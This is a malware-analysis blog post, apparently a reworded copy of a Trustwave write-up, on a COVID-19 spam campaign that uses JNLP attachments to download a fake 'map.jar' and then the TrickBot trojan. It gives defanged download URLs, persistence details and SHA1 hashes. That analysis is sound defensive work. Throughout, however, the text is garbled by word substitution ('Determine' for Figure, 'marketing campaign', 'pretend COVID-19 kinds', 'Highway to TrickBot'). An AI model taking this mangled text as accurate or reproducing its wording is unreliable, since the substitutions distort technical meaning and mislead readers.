Cybercriminals are constantly exploiting the Coronavirus (COVID-19) pandemic. In our quest to watch the COVID-19 associated spams, we not too long ago noticed one attention-grabbing marketing campaign which makes use of an uncommon e mail attachment to ship TrickBot malware.
Determine 1: The spam marketing campaign movement
The Highway to TrickBot
The e-mail, claiming to be from a volunteer group which helps with these looking for COVID-19 monetary help, entices the e-mail recipient to open the attachments – pretend COVID-19 kinds.
Determine 2: Trustwave Safety E mail Gateway displaying a current COVID-19 spam
The attachments are Java Community Launch Protocol (JNLP) information. JNLP information are XML formatted information which can be utilized to launch java packages hosted on a distant server to the consumer machine. If the consumer machine has Java Runtime Surroundings (JRE) put in, JNLP information might be executed through a double click on, as JRE consists of the know-how Java Internet Begin which might run such information.
In Determine 2, the 2 JNLP attachments are equivalent. As soon as executed, they’ll obtain and run the java program “map.jar” hosted at “http[s]://mapcovid[.]internet” – a second stage downloader disguised as COVID-19 “Map” java program.
Determine 3: The attachment SARS-2_Form.jnlp, a pretend COVID-19 kind, is a downloader
Determine 4: The second stage downloader “map.jar” will obtain and execute the principle malware “map.exe”
The downloaded file “map.jar” will launch the World Well being Group’s (WHO) “Q&A on coronaviruses (COVID-19)” webpage to cowl up its malicious conduct – the downloading and set up of the principle malware. This malware, hid as a COVID-19 “Map” executable, might be downloaded from “http[s]://basecovid[.]com/map[.]exe” then saved and executed as %appdata%/map.exe.
The second downloaded file “map.exe” is the modularized banking trojan referred to as TrickBot. This malware is distinguished these days because of its wide selection of functionalities: stealing data, downloading of different malwares, spam emails, and so on.
The TrickBot %appdata%/map.exe might be routinely executed through the Execute() perform of “map.jar”. As soon as run, it can create its set up folder SpotifyMusic on the Startup folder then drop a replica of itself. It should additionally create an encrypted file “settings.ini” – that comprises the configuration of the TrickBot.
Determine 5: Set up path of the downloaded TrickBot
Determine 6: Decrypted TrickBot configuration
The decrypted TrickBot configuration comprises very important data which might be used in the course of the communication of the TrickBot executable to the C&Cs. It consists of the model of the at the moment put in “map.exe” and its group tag , the listing of IP addresses of the C&Cs, and the primary module to be downloaded by “map.exe”.
Determine 7: The reminiscence dump of TrickBot “map.exe” exhibiting the primary request to its C&C
Malware authors are constantly taking benefit the COVID-19 pandemic of their spams. Like different cybercriminals, the risk actors behind this TrickBot malware are unleashing their creativity on crafting the preliminary arrival vector of their malware. Typically, we observe TrickBot being delivered as payloads of malicious doc attachments, significantly macro downloaders. That is the primary time we have now witnessed TrickBot use JNLP information as downloaders. In truth, using JNLP information as e mail attachments, to ship malware, is just not frequent.
It’s probably we will see extra of this type of risk. We’d suggest blocking *.jnlp information at your e mail gateway. We have now added protections for this risk to the Trustwave Safe E mail Gateway for our prospects.
SARS-2_Form.jnlp SHA1: 46576bfebaecaacc4600bba429016b0713238f52
map.jar SHA1: 0068154fbc4374642ebe50ac4f822c64b45635c8
map.exe SHA1: 55b031294ff24919547cfcb4fd4f10a02902ce3b